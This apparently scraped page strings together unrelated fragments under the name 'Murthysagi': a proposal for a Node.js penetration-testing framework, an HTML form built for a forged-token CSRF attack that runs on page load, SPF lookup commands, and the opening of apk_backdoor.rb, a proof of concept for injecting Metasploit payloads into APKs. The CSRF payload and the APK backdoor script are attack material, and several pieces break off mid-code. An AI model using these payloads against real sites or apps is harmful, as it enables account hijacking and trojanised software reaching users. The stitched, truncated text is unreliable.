Murthysagi

Proposal: Node.js penetration test framework

Hi guys! Since I started to write Bluebox-ng I've been tracking the different security projects I found written in Node.js. Now we've published the first stable version we think it's the right moment to speak among us (and, of course, everyone interested in it :).

Why?

• I think we're rewriting the same stuff in our respective projects again and again. For example, almost any tool supports IPv6 because the functions we need are still not present in the Node core and the libraries I found (IMHO) were not enough.
• There're different projects implementing exactly the same thing, ie: port scanners.
• We're working in a too new environment, so we need to make it together.

Murthysagi

<body onload="get()">

<form id="form-payload" action="?action=profile" method="POST" enctype="multipart/form-data">
  <input type="hidden" name="username" value="your_username"/>
  <input type="hidden" name="status" value="on"/>
  <input type="hidden" id="forged-token" name="token" value=""/>
  <input type="submit" value="go"/>
</form>

<script>

Murthysagi

SPF Records

Sender Policy Framework (SPF) is an email validation system designed to prevent spam by detecting email spoofing.

# get spf record domain from google
dig TXT +short google.com

# get spf record from google
dig @8.8.8.8 TXT +short _spf.google.com

Murthysagi

#!/usr/bin/env ruby
# apk_backdoor.rb
# This script is a POC for injecting metasploit payloads on 
# arbitrary APKs.
# Authored by timwr, Jack64
#


require 'nokogiri'
require 'fileutils'